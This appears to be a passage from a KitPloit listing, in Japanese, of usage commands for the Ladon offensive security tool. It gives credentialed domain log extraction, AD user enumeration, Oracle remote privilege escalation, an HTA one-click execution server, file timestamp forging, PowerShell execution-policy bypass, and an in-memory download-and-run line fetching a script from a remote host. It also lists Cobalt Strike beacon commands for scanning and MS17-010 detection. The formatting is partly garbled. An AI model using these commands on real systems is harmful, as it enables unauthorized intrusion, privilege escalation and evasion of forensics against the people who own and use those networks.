   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 ユーザーがLotus管理者であるかどうかを検出```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTAサーバー ワンクリック起動 DOCにアクセスしてもHTAを実行できる```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer Confluenceのバージョンを検出```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD は、Active Directory ユーザーのログイン位置を検索し、ドメインユーザーを列挙するために使用できる```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Oracleデータベースリモート権限昇格ツール 公式ドライバ>=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracleデータベースリモート権限昇格ツール 3つの方法でワンクリック権限昇格```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS C#コードファイルの動的コンパイル```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
ファイル時刻の変更 ファイル時刻の指定

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### ファイルのタイムスタンプ変更 ファイルのタイムスタンプコピー```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell版 Ladon.ps1

0x001 Cmd対話実行```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 ローカル非対話実行```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 リモートメモリロード実行```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 PowerShellデフォルトポリシー実行のバイパス```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 カスタムポートスキャン```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon 生存ホストの検出```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon カスタムポートスキャン```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010脆弱性検出
``````bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

例

http://k8gege.org/Ladon/example-en.html

最新バージョン

小型シールリング版の最新バージョン: http://k8gege.org/Ladon/update.txt

スター数の推移

スター数の推移

ツールをダウンロード